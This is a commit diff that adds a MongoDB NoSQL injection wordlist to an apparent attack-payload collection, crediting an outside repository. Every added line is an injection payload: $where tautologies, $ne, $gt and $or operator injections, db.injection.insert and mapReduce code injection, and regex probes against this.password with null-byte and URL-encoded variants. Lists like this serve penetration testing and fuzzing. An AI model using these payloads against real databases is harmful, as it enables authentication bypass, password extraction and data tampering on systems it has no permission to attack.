added wordlist for no-sqli-injections for mongoDB

2024-11-10 05:24:12 +00:00 · 2016-09-20 12:37:07 +02:00 · 2016-09-20 12:37:07 +02:00 · 0dfbeda6e7
commit 0dfbeda6e7
parent 104aac598d
1 changed files with 18 additions and 0 deletions
--- a/attack/no-sql-injection/mongodb.txt
+++ b/attack/no-sql-injection/mongodb.txt
@ -0,0 +1,18 @@
+# Original source: https://github.com/cr0hn/nosqlinjection_wordlists
+true, $where: '1 == 1'
+, $where: '1 == 1'
+$where: '1 == 1'
+', $where: '1 == 1'
+1, $where: '1 == 1'
+{ $ne: 1 }
+', $or: [ {}, { 'a':'a
+' } ], $comment:'successful MongoDB injection'
+db.injection.insert({success:1});
+db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
+|| 1==1
+' && this.password.match(/.*/)//+%00
+' && this.passwordzz.match(/.*/)//+%00
+'%20%26%26%20this.password.match(/.*/)//+%00
+'%20%26%26%20this.passwordzz.match(/.*/)//+%00
+{$gt: ''}
+[$ne]=1